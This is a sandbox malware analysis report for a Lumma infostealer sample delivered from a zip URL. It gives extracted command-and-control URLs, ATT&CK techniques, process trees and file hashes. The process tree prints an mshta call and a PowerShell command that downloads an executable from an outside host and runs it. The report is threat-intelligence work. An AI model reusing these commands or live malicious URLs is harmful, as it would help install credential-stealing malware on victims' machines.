lumma | hxxps://coconnexion[.]com/comcat[.]zip?&audio=623

Resubmissions

31/03/2025, 20:39

250331-zfkewazqs3 10

31/03/2025, 20:25

250331-y7dkzaxwg1 10

31/03/2025, 20:23

250331-y55lnsxwez 4

Analysis

max time kernel
149s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 20:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://coconnexion.com/comcat.zip?&audio=623

Score

10^/10

lumma discovery execution spyware stealer

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://anaamw.com/p3.php

Extracted

Family

lumma

https://cosmozya.digital/AISuzo

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://opixtreev.run/LkaUz

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://7sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 4 IoCs

flow	pid	Process
82	5220	mshta.exe
84	5220	mshta.exe
86	5220	mshta.exe
95	3996	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3996	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
95	3996	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
6116	Captcha.exe
456	Captcha.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 6116 set thread context of 456	6116	Captcha.exe	135

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Captcha.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Captcha.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133879263269346149"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3156	chrome.exe
3156	chrome.exe
3996	powershell.exe
3996	powershell.exe
3996	powershell.exe
3156	chrome.exe
3156	chrome.exe
456	Captcha.exe
456	Captcha.exe
456	Captcha.exe
456	Captcha.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeShutdownPrivilege	3156	chrome.exe
Token: SeCreatePagefilePrivilege	3156	chrome.exe
Token: SeShutdownPrivilege	3156	chrome.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe
3156	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3156 wrote to memory of 5300	3156	chrome.exe	85
PID 3156 wrote to memory of 5300	3156	chrome.exe	85
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3356	3156	chrome.exe	86
PID 3156 wrote to memory of 3988	3156	chrome.exe	87
PID 3156 wrote to memory of 3988	3156	chrome.exe	87
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88
PID 3156 wrote to memory of 2980	3156	chrome.exe	88

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://coconnexion.com/comcat.zip?&audio=623
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff991c5dcf8,0x7ff991c5dd04,0x7ff991c5dd10
  2⤵
  PID:5300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:3356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1552,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2208 /prefetch:3
  2⤵
  PID:3988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2332,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2476 /prefetch:8
  2⤵
  PID:2980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:2896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4224,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4388 /prefetch:2
  2⤵
  PID:3508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:4660
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4720,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:3212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5884,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5648 /prefetch:1
  2⤵
  PID:5212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5212,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6016 /prefetch:1
  2⤵
  PID:4344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5780,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6264,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6252 /prefetch:8
  2⤵
  PID:1260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5748,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6412 /prefetch:1
  2⤵
  PID:3976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5704,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5944 /prefetch:8
  2⤵
  PID:5636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5968,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5744 /prefetch:8
  2⤵
  PID:2200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5736,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5628 /prefetch:8
  2⤵
  PID:4024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=984,i,9986836467653713376,17328627848604833778,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5600 /prefetch:8
  2⤵
  PID:2404

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2532

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x304 0x4c0
1⤵
PID:4076

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://anaamw.com/p3.php
1⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:5220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3996
- - C:\ProgramData\Captcha.exe
    "C:\ProgramData\Captcha.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:6116
  - - C:\ProgramData\Captcha.exe
      none
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:456

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Captcha.exe

Filesize
1.8MB

MD5
cbb05282e7039f0ccfbc1fbb455f14cb

SHA1
cd06736ff9947e772dc42abf9021b23faf0adf82

SHA256
95295068e3737ca1f0dff1678e8d998ecf69ff150bd8ded6b7097230e1d3ce40

SHA512
4ba10aba0a589c11c22d6306fdc01c183af90bc277e9e076c4fb64b5a752ccdaab07451df89f31e1d863260139cf16240711874ae75341198a7614490773d265

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
87264dc4b912d21f55ae29e1b6c807d1

SHA1
ab464fff0c8f1a0b4146a8b09898389c74997f95

SHA256
2a420794dbbb104b6093781497f2a3b2af32f48a8f9f7e67a848e91d2acc733d

SHA512
2c5c80cd137eb661da942279a7df6f75c9a54fc3ae103cda4dc8ee13fdf0b371ada4d4eff16f57eb42b94f2733ad7c61eb0ed2752c775191a59d57b05ce3bdc1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
312B

MD5
24a59175b5b5aec4b5023a7d808bc5d3

SHA1
68480577800b79e4463c312547b8843629822a47

SHA256
73c986a227a2bc9fdf7ca91ee537e7fa0c399a7dcf2e47272e258b7cd174767f

SHA512
0ea4193fa7d63f7b51ef6f0ada89aa069f6675b66ed3bdfadecadb10191c8a557eeba723d76b4d3f3e7f54cedb2242ea67912f58bdbc685cf35e79964a922720

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
8fe1710cf1cc2932559db48f9414e0d6

SHA1
5d5001cc3e2dd521ebdd63f6031cadf386fcfcba

SHA256
f10d7d666347debcd59fa9a3f76dab49034c69f4063ea259e8ceac939045f00b

SHA512
f8e665076ce6ca731a8b0b612a0f83beee1a05417accd2b891b2e3d5059a4908013af34d0bde3eaa01faa1acc7d1958f00c7171ad8dcaface653d64fb6075ac1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
e1d71985800c54a3297564b97146ada9

SHA1
65faad0c5de3de7736f0999cb66a90719c9875c0

SHA256
7024cde16a5b657ff57ead78378c0f53a0d335d1510c578737c93d0995285bb3

SHA512
33ec3c635c7b55e5b33494a155f85b573616942c9aee6f3b2db4f344f5a315524bc4e1e7a67b8c4d43d4fb5614d802bf292304bc9fb114be05c152dedeb15dec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\a42ec53a-2805-4709-bb4b-5be8a2c42051.tmp

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
0e9fef499c88265911995ef943470a02

SHA1
58c25c39393ee61f78a8a133d7af16ca85b91e04

SHA256
256b218ab4caa8297c95e24a49327e4da9ba0232d070e23050923f52c9eb2d50

SHA512
9e5082401a1f87bbab96cb43f324307bdee44a72490d97ab67d5a33317c7d3b787be63e098d6fcc882f5fe3ddec03efb90bbbbdeb540ec7837555f1253a7a7e5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
bfc33b4c24c10548ff62c0b092a97c2e

SHA1
d829fa846f8d7ad47b43f0d2c941c5c4efe31a95

SHA256
bb8e4d11e264ab05a88a99c65d53ead960f98d3c3e4a17a1555441460e59e54e

SHA512
a3e90d39b4a3bfa50bdcc5c9c50b357bedb3535082f32daf8bedb1b75b3000e6a0b93a0602679933633825ef17d4ab745d2683a23ec4ecd1abc721e175c66b5d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
11KB

MD5
acd6aa39a2f699f8986f891c23614053

SHA1
09edd484e1770c658622e1d1c2702dec5825a6d1

SHA256
57695f3f9c629065384769e18ad432fd786808df50c40fac76e05c436a676f49

SHA512
03900566222401a2e283fd44a0bee0ae4f2a7243aea612ec6620a5f19dc65775ba41fedc086acc25fb9b169d738f24c60405f6c97dc2aa5955e68c32daa29803

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
c8fa1c62e8d486d5d20653e2c556e100

SHA1
